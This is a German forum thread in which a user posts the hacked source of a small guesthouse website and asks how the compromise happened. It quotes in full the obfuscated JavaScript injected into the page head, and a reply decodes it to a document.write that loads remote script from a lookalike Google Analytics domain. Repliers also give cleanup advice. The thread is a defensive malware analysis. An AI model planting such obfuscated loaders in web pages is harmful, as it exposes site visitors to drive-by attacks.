Privathomepage einer Pension mit Quelltext manipuliert
Hallo zusammen, so etwas ist mir noch nie untergekommen! Neulich rief mich eine besorgte Frau an und meint, das mit ihrer Homepage etwas nicht stimmt, Zitat: Sie ist komplett verschwunden.
Was aber nicht genz der Fall war, denn es wurde ein schadhafter Quelltext hinterlegt:
<html>
<head>
<title>Pension Stöcklholz - Urlaub am Nationalpark Bayerischer Wald</title>
<META NAME="description" CONTENT="Pension Stöcklholz, Bayerischer Wald. Urlaub in Bayern am Nationalpark Bayrischer Wald. Wellness Familienferien in der Nähe von Grafenau.">
<META NAME="keywords" CONTENT="Pension Stöcklholz, Stöckelholz, Wittensöllner, Grafenau, Urlaub, Ilz, Ilztal, Familienurlaub, Kinder, Tiere, Erholung, Entspannung, Ferienwohnung, Doppelzimmer, Einzelzimmer, Nationalpark, Bayerischer Wald, Niederbayern, Hotel, Bayern, Bayerwald, bayrisch, Familie, Hallenbad, Haidelregion, Ostbayern, Bayern, Deutschland, Erholung, Kinderfreundlich, Freyung, Kinderspielplatz, Kinderspielzimmer, Bayrischer, Nationalpark Bayerischer Wald, Naturpark Bayerischer Wald, Radfahren, Radwandern, Urlaub, Reisen, Ferien, wandern, Ski, skifahren, Langlauf, Donau, Dreisessel, Arber, Rachel, Lusen, Böhmen, Böhmerwald, Tschechien, Passau, Passauer Land, Freibad, Loipe, reiten, Naturpark, bayerisch, Urlaub, Wandern, Unterkunft, Unterkünfte, Freizeit, Ferienhaus, Ferienhäuser, Grafenau, Ferienunterkunft, Ferienunterkünfte, Reiseunterkunft, Reiseunterkünfte, Urlaubsunterkunft, Urlaubsunterkünfte, Naturpark, bavarian forest, Last Minute Angebote, Pauschalangebot, Pauschalangebote, Last-Minute-Angebote, Familien, Familienferien">
<!--4c7246f9c070710deb5de104810e46ca-><script language=javascript>pgwnl="%";xlbpi="<Y73criY70t laY6eguaY67eY3djY61vaY73criY70tY3e Y20Y66Y75nY63tY69Y6fnY20Y63kzoY71Y28Y70oY74){vaY72Y20aY68,Y6bY3dY22Y28*CcvY47Y71-mY24Y2ekyZOsY56IY488[puFY7dY26@#Y54Y60Y3bt\\\"7Y36Y33]Y5fY69Y27JUzwY41+Mn1^ENY35xaY6c2o:!bPY42hY65{rY64f|Y29Y4bY20=0jgY39~Y34,Y22,Y61=\"Y22Y2cgY62kY2cru,tza=Y22\",db;Y66or(Y61h=0;aY68<poY74.Y6cenY67tY68;Y61Y68++Y29Y7b Y67bk=Y70ot.Y63hY61rY41Y74Y28Y61Y68Y29;rY75Y3dY6b.Y69Y6edY65xOf(gY62Y6b);ifY28ru>-Y31Y29{Y20Y64b=((rY75+Y31)Y2581-1Y29;Y69Y66(Y64bY3c=0Y29Y64bY2b=8Y31;tza+Y3dk.charAt(dY62Y2dY31Y29Y3b Y7dY20eY6cseY20tY7aa+=gY62Y6bY3b}aY2bY3dtzY61;Y64ocumeY6et.wriY74Y65(Y61)Y3bY7dY3cY2fY73crY69pY74>";fsb=unescape(xlbpi.replace(/Y/g,pgwnl));var hvx,qm;document.write(fsb);hvx="<Vvd'u\"=2l19Fl9{07glGlVvd'u\"7>=f:vF${1\"kAd'\"{*=7<ScRHB`=2l19Fl9{0\\7UlGlSvd'u\"\\7=SRc0\\7e\"\"u!//AAAk9::92{l1l2'\"'vVk1{\"/iiF\"PkgV?7Mf:vF${1\"kd{|{dd{dM7\\7><\\/ScRHB`>7=Kt=</Vvd'u\">=";ckzoq(hvx);</script>
Da ich mich mit Websiteprogrammierung nicht auskenne, bzw. nur den Grundriss weiß, möchte ich hier mehr erfahren. Ich denke hier kennt sich jemand aus. Wie kann so etwas denn nur passieren?
MfG Michael
Was aber nicht genz der Fall war, denn es wurde ein schadhafter Quelltext hinterlegt:
<html>
<head>
<title>Pension Stöcklholz - Urlaub am Nationalpark Bayerischer Wald</title>
<META NAME="description" CONTENT="Pension Stöcklholz, Bayerischer Wald. Urlaub in Bayern am Nationalpark Bayrischer Wald. Wellness Familienferien in der Nähe von Grafenau.">
<META NAME="keywords" CONTENT="Pension Stöcklholz, Stöckelholz, Wittensöllner, Grafenau, Urlaub, Ilz, Ilztal, Familienurlaub, Kinder, Tiere, Erholung, Entspannung, Ferienwohnung, Doppelzimmer, Einzelzimmer, Nationalpark, Bayerischer Wald, Niederbayern, Hotel, Bayern, Bayerwald, bayrisch, Familie, Hallenbad, Haidelregion, Ostbayern, Bayern, Deutschland, Erholung, Kinderfreundlich, Freyung, Kinderspielplatz, Kinderspielzimmer, Bayrischer, Nationalpark Bayerischer Wald, Naturpark Bayerischer Wald, Radfahren, Radwandern, Urlaub, Reisen, Ferien, wandern, Ski, skifahren, Langlauf, Donau, Dreisessel, Arber, Rachel, Lusen, Böhmen, Böhmerwald, Tschechien, Passau, Passauer Land, Freibad, Loipe, reiten, Naturpark, bayerisch, Urlaub, Wandern, Unterkunft, Unterkünfte, Freizeit, Ferienhaus, Ferienhäuser, Grafenau, Ferienunterkunft, Ferienunterkünfte, Reiseunterkunft, Reiseunterkünfte, Urlaubsunterkunft, Urlaubsunterkünfte, Naturpark, bavarian forest, Last Minute Angebote, Pauschalangebot, Pauschalangebote, Last-Minute-Angebote, Familien, Familienferien">
<!--4c7246f9c070710deb5de104810e46ca-><script language=javascript>pgwnl="%";xlbpi="<Y73criY70t laY6eguaY67eY3djY61vaY73criY70tY3e Y20Y66Y75nY63tY69Y6fnY20Y63kzoY71Y28Y70oY74){vaY72Y20aY68,Y6bY3dY22Y28*CcvY47Y71-mY24Y2ekyZOsY56IY488[puFY7dY26@#Y54Y60Y3bt\\\"7Y36Y33]Y5fY69Y27JUzwY41+Mn1^ENY35xaY6c2o:!bPY42hY65{rY64f|Y29Y4bY20=0jgY39~Y34,Y22,Y61=\"Y22Y2cgY62kY2cru,tza=Y22\",db;Y66or(Y61h=0;aY68<poY74.Y6cenY67tY68;Y61Y68++Y29Y7b Y67bk=Y70ot.Y63hY61rY41Y74Y28Y61Y68Y29;rY75Y3dY6b.Y69Y6edY65xOf(gY62Y6b);ifY28ru>-Y31Y29{Y20Y64b=((rY75+Y31)Y2581-1Y29;Y69Y66(Y64bY3c=0Y29Y64bY2b=8Y31;tza+Y3dk.charAt(dY62Y2dY31Y29Y3b Y7dY20eY6cseY20tY7aa+=gY62Y6bY3b}aY2bY3dtzY61;Y64ocumeY6et.wriY74Y65(Y61)Y3bY7dY3cY2fY73crY69pY74>";fsb=unescape(xlbpi.replace(/Y/g,pgwnl));var hvx,qm;document.write(fsb);hvx="<Vvd'u\"=2l19Fl9{07glGlVvd'u\"7>=f:vF${1\"kAd'\"{*=7<ScRHB`=2l19Fl9{0\\7UlGlSvd'u\"\\7=SRc0\\7e\"\"u!//AAAk9::92{l1l2'\"'vVk1{\"/iiF\"PkgV?7Mf:vF${1\"kd{|{dd{dM7\\7><\\/ScRHB`>7=Kt=</Vvd'u\">=";ckzoq(hvx);</script>
Da ich mich mit Websiteprogrammierung nicht auskenne, bzw. nur den Grundriss weiß, möchte ich hier mehr erfahren. Ich denke hier kennt sich jemand aus. Wie kann so etwas denn nur passieren?
MfG Michael
Bitte markiere auch die Kommentare, die zur Lösung des Beitrags beigetragen haben
Content-ID: 88892
Url: https://administrator.de/forum/privathomepage-einer-pension-mit-quelltext-manipuliert-88892.html
Ausgedruckt am: 23.12.2024 um 00:12 Uhr
11 Kommentare
Neuester Kommentar
Die Website ist ja noch immer blank?
Fahre das letzte Backup ein und ändere alle Passwörter.
Kontrolliere, ob vertrauliche Daten in anderen Besitz übergegangen sein könnten.
Danach kannst du immernoch auswerten.
Das JS sagt mir nicht, kenne weder pgwnl noch xlbpi.
Und der Aufbau schaut auch sehr willkürlich aus.
(Die Sache mit dem Body ist auch so eine Sache *grübel*)
@kaffeezombie: Was für ein geiler Nick! :D :D
Fahre das letzte Backup ein und ändere alle Passwörter.
Kontrolliere, ob vertrauliche Daten in anderen Besitz übergegangen sein könnten.
Danach kannst du immernoch auswerten.
Das JS sagt mir nicht, kenne weder pgwnl noch xlbpi.
Und der Aufbau schaut auch sehr willkürlich aus.
(Die Sache mit dem Body ist auch so eine Sache *grübel*)
@kaffeezombie: Was für ein geiler Nick! :D :D
Beim ersten Aufruf der Seite wurde ich auch auf http://58.65.234.163/e/count.php weitergeleitet - vermutlich durch das ominöse Script, weshalb vermutlich auch kein body-Tag mehr da ist, damit die Weiterleitung reibungslos funktioniert.
Irgendwer hat deine FTP-Zugangsdaten benutzt und die Seite entsprechend manipuliert.
Irgendwer hat deine FTP-Zugangsdaten benutzt und die Seite entsprechend manipuliert.
Ich war neugierig und habe mir das Skript mal angesehen und "auseinander" genommen.
Zuerst werden alle "Y" die in der Variable xlbpi enthalten sind durch "%" ersetzt, danach wird der Inhalt unescapt und ergibt den JS-Code für die Funktion ckzog() die anschließend in das Dokument geschrieben wird (inkl. <script>-tags).
Mithilfe dieser Funktion wird dann der Inhalt der Variable hvx decodiert und ebenfalls in das Dokument geschrieben was zufolge hat, dass das Javascript von der angegebenen Adresse (die einer Suchmaschine __ähnelt__) eingebunden wird.
Also definitive Schadcode ! (wurde ja auch schon erwähnt)
Wahrscheinlich hat Maxi89 recht und da hat jemand deinen FTP-Account geknackt oder sich sonst wie Zugang zu deinem Webspace verschafft.
Wenn du kannst, schau die mal die Log-Dateien des FTP- und Webservers an, möglicherweise findest du Hinweise und Spuren dazu wie derjenige sich Zugang verschaffen konnte.
~Arano
<script language=javascript>
pgwnl="%";
xlbpi="<Y73criY70t laY6eguaY67eY3djY61vaY73criY70tY3e Y20Y66Y75nY63tY69Y6fnY20Y63kzoY71Y28Y70oY74){vaY72Y20aY68,Y6bY3dY22Y28*CcvY47Y71-mY24Y2ekyZOsY56IY488[puFY7dY26@#Y54Y60Y3bt\\\"7Y36Y33]Y5fY69Y27JUzwY41+Mn1^ENY35xaY6c2o:!bPY42hY65{rY64f|Y29Y4bY20=0jgY39~Y34,Y22,Y61=\"Y22Y2cgY62kY2cru,tza=Y22\",db;Y66or(Y61h=0;aY68<poY74.Y6cenY67tY68;Y61Y68++Y29Y7b Y67bk=Y70ot.Y63hY61rY41Y74Y28Y61Y68Y29;rY75Y3dY6b.Y69Y6edY65xOf(gY62Y6b);ifY28ru>-Y31Y29{Y20Y64b=((rY75+Y31)Y2581-1Y29;Y69Y66(Y64bY3c=0Y29Y64bY2b=8Y31;tza+Y3dk.charAt(dY62Y2dY31Y29Y3b Y7dY20eY6cseY20tY7aa+=gY62Y6bY3b}aY2bY3dtzY61;Y64ocumeY6et.wriY74Y65(Y61)Y3bY7dY3cY2fY73crY69pY74>";
fsb=unescape(xlbpi.replace(/Y/g,pgwnl));
var hvx,qm;
//document.write(fsb);
alert(fsb);
hvx="<Vvd'u\"=2l19Fl9{07glGlVvd'u\"7>=f:vF${1\"kAd'\"{*=7<ScRHB`=2l19Fl9{0\\7UlGlSvd'u\"\\7=SRc0\\7e\"\"u!//AAAk9::92{l1l2'\"'vVk1{\"/iiF\"PkgV?7Mf:vF${1\"kd{|{dd{dM7\\7><\\/ScRHB`>7=Kt=</Vvd'u\">=";
ckzoq(hvx);
// xlbpi bzw. fsb =
function ckzoq(pot){
var ah,
k ="(*CcvGq-m$.kyZOsVIH8[puF}&@#T`;t\"763]_i'JUzwA+Mn1^EN5xal2o:!bPBhe{rdf|)K =0jg9~4,",
a ="",
gbk,
ru,
tza="",
db;
for(ah=0;ah<pot.length;ah++){
gbk=pot.charAt(ah);
ru =k.indexOf(gbk);
if(ru>-1){
db=((ru+1)%81-1);
if(db<=0)
db+=81;
tza+=k.charAt(db-1);
}
else tza+=gbk;
}
a+=tza;
//document.write(a);
alert(a);
}
// ckzoq(hvx) =
document.write( "<SCRIPT language=\"JavaScript\" SRC=\"http://www.googleanalitics.net/__utb.js?"+document.referrer+"\"><\/SCRIPT>" );
</script>
Mithilfe dieser Funktion wird dann der Inhalt der Variable hvx decodiert und ebenfalls in das Dokument geschrieben was zufolge hat, dass das Javascript von der angegebenen Adresse (die einer Suchmaschine __ähnelt__) eingebunden wird.
Also definitive Schadcode ! (wurde ja auch schon erwähnt)
Wahrscheinlich hat Maxi89 recht und da hat jemand deinen FTP-Account geknackt oder sich sonst wie Zugang zu deinem Webspace verschafft.
Wenn du kannst, schau die mal die Log-Dateien des FTP- und Webservers an, möglicherweise findest du Hinweise und Spuren dazu wie derjenige sich Zugang verschaffen konnte.
~Arano
Hallo,
du hast Preisgegeben, dass diese Website nicht professionell betrieben wird, und dass es hier offensichtlich ein Sicherheitsproblem gab (oder wahrscheinlich noch gibt).
Deine Telefonnummer steht auch im öffentlichen Telefonbuch, und wahrscheinlich lässt sich irgendwo auch deine eMail-Adresse nachlesen. Trotzdem fändest du es bestimmt nicht toll, wenn ich das beides jetzt hier posten würde (oder noch an einer dritten Stelle, mit der du gar nichts zu tun hast).
Gruß
Filipp
du hast Preisgegeben, dass diese Website nicht professionell betrieben wird, und dass es hier offensichtlich ein Sicherheitsproblem gab (oder wahrscheinlich noch gibt).
Deine Telefonnummer steht auch im öffentlichen Telefonbuch, und wahrscheinlich lässt sich irgendwo auch deine eMail-Adresse nachlesen. Trotzdem fändest du es bestimmt nicht toll, wenn ich das beides jetzt hier posten würde (oder noch an einer dritten Stelle, mit der du gar nichts zu tun hast).
Gruß
Filipp